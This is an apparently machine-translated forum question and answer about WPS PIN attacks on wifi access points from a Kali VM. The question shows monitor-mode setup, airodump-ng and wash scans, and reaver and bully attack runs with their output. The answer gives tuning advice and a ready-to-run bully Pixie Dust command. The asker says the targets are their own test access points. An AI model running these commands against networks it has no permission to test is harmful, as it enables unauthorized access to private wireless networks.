私のハードウェアは次のようになります。RHELを実行しているLenovoラップトップ、およびVirtual Machine ManagerがKali LinuxでVMを起動します。これらのネットワークカードを試してみました:
VM=ライブモードで起動し(永続ストレージは不要))、これらのネットワークカードのいずれかを一度に共有します。これらすべてで、まったく同じ結果が得られます。
最初に、これらの2行を実行して、ssh経由でアクセスできるようにし、ターミナルエクスペリエンスなどを向上させます。
$ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
$ service ssh start
ネットワークインターフェースの設定について詳しく説明します。
root@kali:~# airmon-ng start wlan0
Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
PID Name
963 NetworkManager
1087 dhclient
1534 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb Ralink Technology, Corp. RT3572
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
root@kali:~# iwconfig eth0 no wireless extensions.
wlan0mon IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
lo no wireless extensions.
root@kali:~# ifconfig wlan0mon down
root@kali:~# iwconfig wlan0mon mode monitor
root@kali:~# ifconfig wlan0mon up
root@kali:~# iwconfig eth0 no wireless extensions.
wlan0mon IEEE 802.11abgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
そしてその後、いくつかの発見:
root@kali:~# airodump-ng wlan0mon
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX -80 2 0 0 1 54e WPA2 CCMP MGT NumA
XX:XX:XX:XX -28 2 0 0 6 54e WPA2 CCMP PSK NumB
XX:XX:XX:XX -81 2 0 0 11 54e WPA2 CCMP MGT NumC
root@kali:~# wash -i wlan0mon
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
root@kali:~# wash -i wlan0mon -C
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX 1 -73 1.0 No WiA
XX:XX 6 -27 1.0 No WiB
XX:XX 11 -77 1.0 No WiC
そして今、攻撃部分:
root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from XX:XX:XX:XX
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 11
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
また、いじめっ子を使用して:
root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan0mon' to channel '11'
[!] Using 'XX:XX:XX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:XX:XX' on channel '11'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'TargetA' (XX:XX:XX)
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '36490264'
私のプレイグラウンドアクセスポイントのうち少なくとも2つは、macアドレス(私が呼び出したと思われるpixie dust)に基づく攻撃に対して脆弱であることを知っています。私はいくつかの安価なAndroid no name Android phoneを使用してそれらをクラックすることに成功しました。そしてこの攻撃は私のネットワークカードの組み合わせでは機能しません/ターゲットアクセスでもありませんポイント。
欠落している構成、または欠落しているハードウェアの互換性のいずれかが必要です。
これらのネットワークカードは監視モード用であることは知っています。wpsもサポートする必要があると思いますが、まだ動作するように管理していません。 WPS攻撃を実行するために特定のものが必要ですか?
私はあなたにいくつかの推奨事項を持っています。
まず第一に。私が間違っていない場合は、両方のAlfaがRalinkチップセットベースです。 Ralinkチップセットとリーバーがひどい結果をもたらすことを知っている必要があります。いじめっ子を使うほうがずっといいです。
もう1つの重要なことは、-N
(--no-nacks)引数を使用するリーバーです。使ってみてください。このパラメータを使用すると、順不同のパケットが受信されたときにNACKメッセージを送信しません。多分それはあなたを助けるかもしれませんが、私が私の最初のポイントで言ったように... Ralink + reaver = crapを使用します。
Pixie Dust攻撃は、特定のバージョン(Bullyの場合は1.1、Reaverの場合は1.5.2)がある場合、ReaverとBullyに直接統合できます。したがって、ログから、Reaverを使用して実行できるように見えますが、再び問題が発生します(Ralink blah blah blah ...)。だから私の提案は、いじめっ子バージョンを更新することです。 Kaliでは、リポジトリからバージョン1.1を直接入手できます。そして、次のコマンドを使用して直接実行できます。
bully wlan0mon -b XX:XX:XX:XX:XX:XX -c 11 -d -v 3
注1もちろん、pixiewpsもインストールしておく必要があります。 Kaliのaptで簡単に入手できます。リポジトリにあります。
注2いじめっ子1.1では、詳細レベルを3から4に上げることができます。これは以前のバージョンでは機能しません。
一部のAPがWPS攻撃に対して脆弱であることを確信している場合は、-p xxxxxxxx
オプションを使用して直接テストできます。あなたはAPのオーナーだと思いますよね。そしてもちろん、あなたはピンを知っています。このオプションを使用して、パスワードを取得できるかどうかをテストできます。あなたが持っているソフトウェアとチップセットのどの組み合わせが問題なく動作しているかを知ることは役に立ちます。
最後の推奨事項は、いくつかのワイヤレススクリプトを試してください。私が協力しているもの airgeddon 。
それが役に立てば幸い!